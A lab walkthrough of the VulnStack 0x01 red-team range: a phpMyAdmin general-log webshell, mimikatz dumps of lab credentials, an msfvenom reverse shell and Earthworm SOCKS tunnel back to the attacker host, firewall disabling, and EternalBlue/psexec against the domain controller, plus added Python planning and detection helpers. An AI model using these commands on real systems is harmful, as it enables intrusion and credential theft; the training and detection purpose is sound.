VulnStack 0x01
Learned from:
Basic information
name | host | password | notes
---|---|---|---
win7 | 192.168.52.143 (internal), 192.168.21.145 (external) | xzasLXR1 | web server, dual-homed edge host
win2k3 | 192.168.52.141 | xzasLXR1 | domain member
win2008 | 192.168.52.138 | xzas@157 | domain controller
kali | 192.168.21.129 | | attacker
Win7
webshell
result of dirsearch
/yxcms
/phpmyAdmin
/phpMyAdmin
Lesson: a good wordlist matters. The killer was that I hadn't found a suitable wordlist; whatever, I'll just add yxcms to the wordlist lol
yxcms
- Visit yxcms
The form in the bottom-right corner carries a hint:
Enter through /index.php?r=admin. Backend username: admin; password: 123456; please change the default password after logging in.
- Visit the backend
http://192.168.21.145/yxcms/index.php?r=admin
username | password |
---|---|
admin | 123456 |
- webshell
Use the backend's page-editing feature to write a webshell.
I still prefer AntSword.
phpmyadmin
Visit phpMyAdmin
Log in with the default credentials
username | password |
---|---|
root | root |
Common ways to get a shell from phpMyAdmin:
1. Write the file directly with select ... into outfile
2. Enable the general log and point it into the webroot
3. Use the slow query log in the same way
4. Use the error log
5. Exploit the phpMyAdmin 4.8.x local file inclusion vulnerability
- Check secure_file_priv


Note that secure_file_priv is a read-only variable: it can only be set in my.ini at server start, so if it is NULL or points outside the webroot, the into outfile route cannot be enabled from phpMyAdmin.
- So use the log method instead
- Check the current general log settings
show global variables like "%genera%";
Variable_name | Value
---|---
general_log | OFF
general_log_file | C:\phpStudy\MySQL\data\stu1.log
- Turn the log on and point the log file into the webroot
set global general_log='ON';
set global general_log_file='C:/phpStudy/WWW/fe1w0.php';
select '';
From this point every statement is appended verbatim to fe1w0.php, so the string selected in the last statement (the PHP one-liner) becomes the webshell body. Use forward slashes in the path, since a backslash inside a MySQL string literal starts an escape sequence, and point general_log_file back at the original file afterwards.
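As an added example (not code from the original writeup): a small Python helper that applies the secure_file_priv rule, builds the general-log statement sequence with the path handling described above and restores the log afterwards, plus the matching defender-side check over a constructed general-log excerpt. The webroot, shell name, payload string and log lines are assumptions for illustration; SAMPLE_VARS mirrors the variable values shown above.

```python
"""Decide which phpMyAdmin getshell route is viable and spot the log trick in MySQL logs.

Added example, not code from the original writeup. SAMPLE_VARS mirrors the
variable values shown above for the lab's phpStudy MySQL; the webroot, shell
name, payload string and the general-log lines are constructed for illustration.
"""
import re

# Constructed from the `show global variables` output above.
SAMPLE_VARS = {
    "secure_file_priv": "NULL",
    "general_log": "OFF",
    "general_log_file": r"C:\phpStudy\MySQL\data\stu1.log",
}


def outfile_allowed(secure_file_priv, target_path):
    """True if SELECT ... INTO OUTFILE may write target_path.

    secure_file_priv is read-only at runtime: '' means any path the mysqld
    account can write, NULL disables file import/export entirely, and a
    directory restricts writes to that directory tree.
    """
    if secure_file_priv is None or secure_file_priv.upper() == "NULL":
        return False
    if secure_file_priv == "":
        return True
    base = secure_file_priv.replace("\\", "/").rstrip("/").lower() + "/"
    return target_path.replace("\\", "/").lower().startswith(base)


def plan_log_getshell(variables, webroot, shell_name, payload):
    """Statements that redirect the general log into the webroot, then restore it.

    Forward slashes are used in the path: inside a MySQL string literal a
    backslash starts an escape sequence, so 'C:\\t...' would contain a tab.
    """
    log_path = webroot.replace("\\", "/").rstrip("/") + "/" + shell_name
    old_path = variables["general_log_file"].replace("\\", "/")
    return [
        "SET GLOBAL general_log = 'ON';",
        "SET GLOBAL general_log_file = '%s';" % log_path,
        # every statement is appended to the log verbatim, so this one lands
        # in the .php file and becomes the webshell body
        "SELECT '%s';" % payload.replace("'", "\\'"),
        # put the log back so the server keeps behaving normally
        "SET GLOBAL general_log_file = '%s';" % old_path,
        "SET GLOBAL general_log = '%s';" % variables["general_log"],
    ]


# Defender side: things a general log (or a SQL proxy log) should never contain.
INDICATORS = re.compile(
    r"general_log_file\s*=\s*'[^']*\.(?:php|phtml|jsp|aspx?)'"  # log aimed at a webroot
    r"|<\?(?:php|=)"                                            # PHP open tag in a query
    r"|\beval\s*\(",                                            # classic one-liner body
    re.IGNORECASE,
)


def detect_log_getshell(log_lines):
    """Return (line_no, line) for every line matching an indicator."""
    return [(n, line) for n, line in enumerate(log_lines, 1) if INDICATORS.search(line)]


# Constructed general-log excerpt in the MySQL 5.7 format (timestamp, thread id, command, text).
SAMPLE_GENERAL_LOG = [
    "2020-05-09T07:10:01.000000Z\t    7 Connect\troot@localhost on  using TCP/IP",
    "2020-05-09T07:10:02.000000Z\t    7 Query\tshow global variables like '%genera%'",
    "2020-05-09T07:10:03.000000Z\t    7 Query\tSET GLOBAL general_log_file = 'C:/phpStudy/WWW/fe1w0.php'",
    "2020-05-09T07:10:04.000000Z\t    7 Query\tSELECT '<?php @eval($_POST[\"cmd\"]);?>'",
    "2020-05-09T07:10:05.000000Z\t    7 Quit\t",
]

if __name__ == "__main__":
    for stmt in plan_log_getshell(SAMPLE_VARS, r"C:\phpStudy\WWW", "fe1w0.php",
                                  '<?php @eval($_POST["cmd"]);?>'):
        print(stmt)
    for n, line in detect_log_getshell(SAMPLE_GENERAL_LOG):
        print("suspicious line %d: %s" % (n, line))
```

The restore statements matter in a real engagement as much as in the lab: leaving the general log pointed at a .php file keeps growing the webshell with every query and is the first thing an admin notices.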




Information gathering
I found that AntSword sometimes glitches when returning command output.
Basics
Local host information gathering
Command | Description
---|---
net view | Get the computer names in the current group; lists machines in the same domain/workgroup
net user | Query user information
query user / qwinsta | Query currently logged-on users
net localgroup administrators | Query the local administrators group; on a domain-joined machine this usually includes domain accounts or groups
ipconfig /all | Query network configuration; the DNS suffix tells you whether the machine is in a domain
nslookup | Resolve the domain name to an IP and compare it with the DNS server address to judge whether the domain controller and the DNS server are the same machine (dig on Linux)
systeminfo | Get system information
tasklist | List processes, e.g. to check for AV
netstat -ano | List listening ports and connections
There are other commonly used commands as well.
Details:
C:\tmp> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
GOD\Domain Admins
liukaifeng01
The command completed successfully.
C:\tmp> systeminfo
Host Name:                 STU1
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Domain:
GOD\Domain Admins in the local administrators group and "Member Workstation" both confirm that this host is joined to the GOD domain.
Domain information gathering
- whoami /all
Shows the current user's SID (the domain SID is its prefix), group memberships and privileges
- net user test1 /domain
Query details of the specified domain account
- net config workstation
Query the current logon domain and logged-on user
- net time /domain
Three outcomes are possible:
1. A domain exists but the current user is not a domain user: the command reports insufficient permissions
2. A domain exists and the current user is a domain user: the time is returned from a DC, whose name is printed
3. The network is a workgroup and there is no domain
- net group "Domain Controllers" /domain
Find the domain controllers
WMIC scripts can also be used for collection:
http://www.fuzzysecurity.com/scripts/files/wmic_info.rar
Discovering other hosts in the domain
Here arp-scan and nbtscan are used to enumerate hosts in the domain. In the arp-scan output the 192.168.52.255 entry is the subnet broadcast address, not a host; its MAC is that of .143, the scanner itself.
arp-scan_64.exe -t 192.168.52.1/20 >1.txt
Reply that 00:0C:29:86:6F:BA is 192.168.52.138 in 15.289000
Reply that 00:0C:29:2A:99:BC is 192.168.52.141 in 16.001900
Reply that 00:0C:29:A3:B3:2A is 192.168.52.143 in 0.040600
Reply that 00:0C:29:A3:B3:2A is 192.168.52.255 in 0.048100
C:\tmp> nbtscan-1.0.35.exe 192.168.52.0/24 >z.txt
*timeout (normal end of scan)
192.168.52.138 GOD\OWA SHARING DC
192.168.52.141 GOD\ROOT-TVI862UBEH SHARING
192.168.52.143 GOD\STU1 SHARING
ip | notes
---|---
192.168.52.138 | DC (OWA)
192.168.52.141 | other machine in the domain (ROOT-TVI862UBEH, win2k3)
192.168.52.143 | current machine (STU1, win7)
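Added example, not from the original writeup: merging the two scan outputs above into one host table in Python, so the DC flag from nbtscan and the MAC from arp-scan end up on the same row and the broadcast-address reply is dropped. The regexes are assumptions about the two tools' line formats, derived from the output shown.

```python
"""Merge arp-scan and nbtscan output into one host table.

Added example, not from the original writeup. The two sample outputs are the
scan results shown above; the line-format regexes are assumptions about
arp-scan_64.exe and nbtscan-1.0.35.exe derived from that output.
"""
import ipaddress
import re

ARP_SCAN_OUTPUT = """
Reply that 00:0C:29:86:6F:BA is 192.168.52.138 in 15.289000
Reply that 00:0C:29:2A:99:BC is 192.168.52.141 in 16.001900
Reply that 00:0C:29:A3:B3:2A is 192.168.52.143 in 0.040600
Reply that 00:0C:29:A3:B3:2A is 192.168.52.255 in 0.048100
"""

NBTSCAN_OUTPUT = r"""
192.168.52.138 GOD\OWA SHARING DC
192.168.52.141 GOD\ROOT-TVI862UBEH SHARING
192.168.52.143 GOD\STU1 SHARING
*timeout (normal end of scan)
"""

ARP_RE = re.compile(r"Reply that ([0-9A-Fa-f:]{17}) is (\d+\.\d+\.\d+\.\d+)")
NBT_RE = re.compile(r"^(\d+\.\d+\.\d+\.\d+)\s+(?:(\S+)\\)?(\S+)\s*(.*)$")


def parse_arp_scan(text, network):
    """Return {ip: mac}, dropping the reply for the subnet broadcast address.

    The .255 line above carries the same MAC as .143 (the scanning host), so it
    is the broadcast address answering, not a fourth machine.
    """
    net = ipaddress.ip_network(network, strict=False)
    hosts = {}
    for m in ARP_RE.finditer(text):
        mac, ip = m.group(1).upper(), m.group(2)
        if ipaddress.ip_address(ip) == net.broadcast_address:
            continue
        hosts[ip] = mac
    return hosts


def parse_nbtscan(text):
    """Return {ip: (domain, netbios_name, [flags])}; non-host lines are skipped."""
    hosts = {}
    for line in text.splitlines():
        m = NBT_RE.match(line.strip())
        if not m:
            continue  # e.g. '*timeout (normal end of scan)'
        ip, domain, name, flags = m.groups()
        hosts[ip] = (domain, name, flags.split())
    return hosts


def merge_hosts(arp, nbt):
    """One row per IP seen by either tool; DC is taken from nbtscan's DC flag."""
    rows = []
    for ip in sorted(set(arp) | set(nbt), key=ipaddress.ip_address):
        domain, name, flags = nbt.get(ip, (None, None, []))
        rows.append({
            "ip": ip,
            "mac": arp.get(ip),
            "domain": domain,
            "name": name,
            "is_dc": "DC" in flags,
        })
    return rows


if __name__ == "__main__":
    table = merge_hosts(parse_arp_scan(ARP_SCAN_OUTPUT, "192.168.52.0/24"),
                        parse_nbtscan(NBTSCAN_OUTPUT))
    for row in table:
        print("%-15s %-17s %-4s %-17s %s" % (row["ip"], row["mac"], row["domain"],
                                              row["name"], "DC" if row["is_dc"] else ""))
```

A host that only arp-scan sees (MAC but no NetBIOS answer) is still worth a port scan later; a host that only nbtscan sees is usually outside the ARP range you swept.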
Local credentials
Upload mimikatz
Note: it's best to get a cmd.exe back with nc first here; in AntSword you may not see the output.
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" "exit" > log.log
Authentication Id : 0 ; 2568929 (00000000:002732e1)
Session : Interactive from 1
User Name : Administrator
Domain : GOD
Logon Server : OWA
Logon Time : 2020/5/9 15:01:10
SID : S-1-5-21-2952760202-1353902439-2381784089-500
msv :
[00000003] Primary
- Username : Administrator
- Domain : GOD
- LM : 1121a434316e2b1ec2265b23734e0dac
- NTLM : b8529ce2d4fa8ba1adc67295abefe12e
- SHA1 : 11540fad9cb5ed35fe7f599aef2b0fa58c0fdec4
tspkg :
- Username : Administrator
- Domain : GOD
- Password : xzasLXR1
Disable the firewall
On win7, disable the Windows firewall (netsh advfirewall set allprofiles state off, the same command used against the DC later) so the reverse shell and the ew tunnel below are not blocked.
Entering the internal network
Build the backdoor payload
#kali
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.21.129 lport=23333 -f exe > /root/Desktop/reverse_tcp.exe
Upload the payload to win7 and run it. (The lport baked into the payload must match the LPORT the handler listens on; the handler transcript below uses 23334.)


msf handler on kali
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.21.129
LHOST => 192.168.21.129
msf5 exploit(multi/handler) > set LPORT 23334
LPORT => 23334
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.21.129:23334
[*] Sending stage (206403 bytes) to 192.168.21.145
[*] Meterpreter session 1 opened (192.168.21.129:23334 -> 192.168.21.145:7746) at 2020-05-09 10:02:12 -0400
meterpreter > pwd
C:\tmp
Proxy
But for kali to reach the internal network directly, we still need a proxy.
Time to bring out the trusty Earthworm (ew).
Reverse SOCKS v5 server
Likewise, first upload ew_for_Win.exe to the edge host (win7).
- kali
Edit the proxychains config
File: /etc/proxychains.conf
Change it to:
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 127.0.0.1 9050
#socks5 192.168.21.144 1080
socks5 127.0.0.1 1080
Listen on port 1080 (ew accepts proxy clients on 1080 and the reverse connection from win7 on 8888, relaying between them)
./ew_for_linux64 -s rcsocks -l 1080 -e 8888
- win7
ew_for_Win.exe -s rssocks -d 192.168.21.129 -e 8888
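Added example, not from the original writeup: before chaining msfconsole through proxychains, confirm the tunnel actually reaches the internal network with a raw SOCKS5 (RFC 1928) exchange against the listener ew opened on 127.0.0.1:1080. The target (the DC's SMB port) is an assumption; a reply code other than 0 means the internal connect failed on the win7 side, while a refused TCP connection to 1080 means rcsocks itself is not up.

```python
"""Check that the ew rcsocks/rssocks tunnel really proxies into 192.168.52.0/24.

Added example, not part of the original writeup. It speaks raw SOCKS5 (RFC 1928)
to the listener ew opened on 127.0.0.1:1080 and asks it to CONNECT to an internal
host/port; the target below (the DC's SMB port) is an assumption for illustration.
"""
import socket
import struct

SOCKS_VERSION = 5
CMD_CONNECT = 1
ATYP_IPV4, ATYP_DOMAIN = 1, 3
REPLY_TEXT = {
    0: "succeeded", 1: "general SOCKS server failure", 2: "connection not allowed",
    3: "network unreachable", 4: "host unreachable", 5: "connection refused",
    6: "TTL expired", 7: "command not supported", 8: "address type not supported",
}


def greeting():
    """Client hello offering only 'no authentication' (ew's rssocks takes no auth)."""
    return bytes([SOCKS_VERSION, 1, 0])


def connect_request(host, port):
    """CONNECT request; dotted-quad hosts go as ATYP 1, anything else as a domain
    name so that DNS resolution happens on the far (internal) side of the tunnel."""
    try:
        addr = bytes([ATYP_IPV4]) + socket.inet_aton(host)
    except OSError:
        name = host.encode()
        addr = bytes([ATYP_DOMAIN, len(name)]) + name
    return bytes([SOCKS_VERSION, CMD_CONNECT, 0]) + addr + struct.pack("!H", port)


def parse_method_reply(data):
    """Server's chosen auth method; 0xFF means none of ours was acceptable."""
    if len(data) != 2 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 method reply: %r" % data)
    if data[1] == 0xFF:
        raise ValueError("proxy rejected our auth methods")
    return data[1]


def parse_connect_reply(data):
    """Return (reply_code, text); anything but 0 means the internal connect failed."""
    if len(data) < 4 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 connect reply: %r" % data)
    code = data[1]
    return code, REPLY_TEXT.get(code, "unknown(%d)" % code)


def check_tunnel(proxy=("127.0.0.1", 1080), target=("192.168.52.138", 445), timeout=5):
    """Live check: True when the proxy can open target through the tunnel."""
    with socket.create_connection(proxy, timeout=timeout) as s:
        s.sendall(greeting())
        parse_method_reply(s.recv(2))
        s.sendall(connect_request(*target))
        code, text = parse_connect_reply(s.recv(10))  # 4 header + 4 IPv4 + 2 port
        print("%s:%d via %s:%d -> %s" % (*target, *proxy, text))
        return code == 0


if __name__ == "__main__":
    check_tunnel()
```

proxychains does exactly this handshake for every connection msf makes, which is why the |S-chain| lines in the scans below show one hop per target port; if check_tunnel() returns False for a port you know is open, fix the tunnel before blaming the exploit.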
Proxy msf
Start msfconsole through proxychains so the modules below reach 192.168.52.0/24 via the tunnel; the |S-chain| lines in the output are proxychains reporting each hop.


Port scan
msf5 > use scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.52.138 192.168.52.141
RHOSTS => 192.168.52.138 192.168.52.141
msf5 auxiliary(scanner/portscan/tcp) > set PORTS 3389,139,445,80,8080,21
PORTS => 3389,139,445,80,8080,21
msf5 auxiliary(scanner/portscan/tcp) > set threads 65
threads => 65
msf5 auxiliary(scanner/portscan/tcp) > run
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:21-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:139-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:80-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:445-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:8080-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:139-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:21-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:3389-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:8080-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:445-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:3389-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:80-<><>-OK
[+] 192.168.52.138: - 192.168.52.138:139 - TCP OPEN
<><>-OK
[+] 192.168.52.138: - 192.168.52.138:80 - TCP OPEN
<><>-OK
[+] 192.168.52.138: - 192.168.52.138:445 - TCP OPEN
<><>-OK
[+] 192.168.52.141: - 192.168.52.141:139 - TCP OPEN
<><>-OK
[+] 192.168.52.141: - 192.168.52.141:21 - TCP OPEN
<><>-OK
[+] 192.168.52.141: - 192.168.52.141:445 - TCP OPEN
<--timeout
<--timeout
<--timeout
<--timeout
<--timeout
<--timeout
[*] Scanned 1 of 2 hosts (50% complete)
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
MS17-010
https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010
Scan
msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.52.141 192.168.52.138
RHOSTS => 192.168.52.141 192.168.52.138
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:135-<><>-OK
[+] 192.168.52.141:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 3790 x86 (32-bit)
[*] Scanned 1 of 2 hosts (50% complete)
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:135-<><>-OK
[+] 192.168.52.138:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (64-bit)
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) >
exploit: error
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.52.138
RHOSTS => 192.168.52.138
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
But it fails. The payload is bind_tcp because kali (192.168.21.x) is not reachable from the 192.168.52.x network, so a reverse payload could not connect back; the bind port on the DC is presumably blocked by its firewall, which is what the next step removes.
Auxiliary module: disable the firewall
msf5 exploit(windows/smb/ms17_010_eternalblue) > use auxiliary/admin/smb/ms17_010_command
msf5 auxiliary(admin/smb/ms17_010_command) > set RHOSTS 192.168.52.138
RHOSTS => 192.168.52.138
msf5 auxiliary(admin/smb/ms17_010_command) > set COMMAND netsh advfirewall set allprofiles state off
COMMAND => netsh advfirewall set allprofiles state off
msf5 auxiliary(admin/smb/ms17_010_command) > run
Then run the exploit again.


Errors can still happen, and it's really unstable.
You can try process migration (run post/windows/manage/migrate), but it doesn't help much; sessions still die at random. I suspect the proxy is to blame.
mimikatz
Afterwards mimikatz can be used to dump passwords (wdigest here is the meterpreter mimikatz extension's command).
(Someone has to have logged on first for it to return anything useful.)
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;45394 NTLM
0;995 Negotiate NT AUTHORITY IUSR
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;996 Negotiate GOD OWA$ 23 25 9c f9 6d 81 30 d0 bf a5 99 d8 50 78 6d 69 c7 ba 82 c0 5a f5 1d 44 ee ec 10 e3 c9 14 87 0f 75 28 ea 63 6a 61 1f 81 35 28 fa 93 cf 7d ea 98 7c d9 09 1b e4 86 96 82 a5 2a fc 52 c1 33 ba 19 54 88 0f 5d f2 30 ac 26 97 55 33 f8 4f 61 58 52 c3 b2 3f 3b 8d b2 4d 19 3d 76 d9 ba a5 a8 26 94 96 a0 dc 86 37 30 a5 bf 6a 2a 92 2c 1e 08 a5 4b 9a 4d 9e d7 85 1a 36 07 55 d8 34 5b 47 58 21 43 34 17 d2 0a 74 9a 52 a4 9f 76 9e 25 0a f0 df ea 9e 34 7d c1 87 e2 9a 10 8e 06 cf a8 be 91 b0 35 09 bb cb db 51 6d 8d 0d ce 5b d5 40 9a 08 30 d5 29 d5 4f b7 c7 9b ab 4c 06 59 d9 0b 2f d7 fa 2d 07 4f 7d 62 a1 c9 97 74 61 bb c5 e3 a1 95 19 6e a9 8a 4d a1 3a 1a fa 09 cb 57 3e 0b 4e b1 fc eb 22 d0 07 05 97 a2 a2 aa d9 69 67 70 53 0e 37 92
0;999 Negotiate GOD OWA$ 23 25 9c f9 6d 81 30 d0 bf a5 99 d8 50 78 6d 69 c7 ba 82 c0 5a f5 1d 44 ee ec 10 e3 c9 14 87 0f 75 28 ea 63 6a 61 1f 81 35 28 fa 93 cf 7d ea 98 7c d9 09 1b e4 86 96 82 a5 2a fc 52 c1 33 ba 19 54 88 0f 5d f2 30 ac 26 97 55 33 f8 4f 61 58 52 c3 b2 3f 3b 8d b2 4d 19 3d 76 d9 ba a5 a8 26 94 96 a0 dc 86 37 30 a5 bf 6a 2a 92 2c 1e 08 a5 4b 9a 4d 9e d7 85 1a 36 07 55 d8 34 5b 47 58 21 43 34 17 d2 0a 74 9a 52 a4 9f 76 9e 25 0a f0 df ea 9e 34 7d c1 87 e2 9a 10 8e 06 cf a8 be 91 b0 35 09 bb cb db 51 6d 8d 0d ce 5b d5 40 9a 08 30 d5 29 d5 4f b7 c7 9b ab 4c 06 59 d9 0b 2f d7 fa 2d 07 4f 7d 62 a1 c9 97 74 61 bb c5 e3 a1 95 19 6e a9 8a 4d a1 3a 1a fa 09 cb 57 3e 0b 4e b1 fc eb 22 d0 07 05 97 a2 a2 aa d9 69 67 70 53 0e 37 92
0;329096 Kerberos GOD liukaifeng01 xzas@157
0;329127 Negotiate GOD liukaifeng01 xzas@157
exploit: success
msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set RHOSTS 192.168.52.138
RHOSTS => 192.168.52.138
msf5 exploit(windows/smb/psexec) > set SMBDomain god.org
SMBDomain => god.org
msf5 exploit(windows/smb/psexec) > set SMBUSER liukaifeng01
SMBUSER => liukaifeng01
msf5 exploit(windows/smb/psexec) > set SMBPASS xzas@157
SMBPASS => xzas@157
msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/psexec) > set LPORT 8553
LPORT => 8553


Much more stable than before.
CobaltStrike
Official site
link : https://www.cobaltstrike.com
A senior has posted translated videos on Bilibili
link : https://www.bilibili.com/video/BV1S7411k7pU/
Honestly, once you follow 合天 and friends on Bilibili, you'll get to know basically every infosec video and uploader on the site.
Other learning links:
CS 4.0 still to try
Afterword
Argh, there's still so much I can't do. Once I've finished this exercise,
I'll properly study 《内网安全攻防》.
It's tough; I'll record the video after the competition.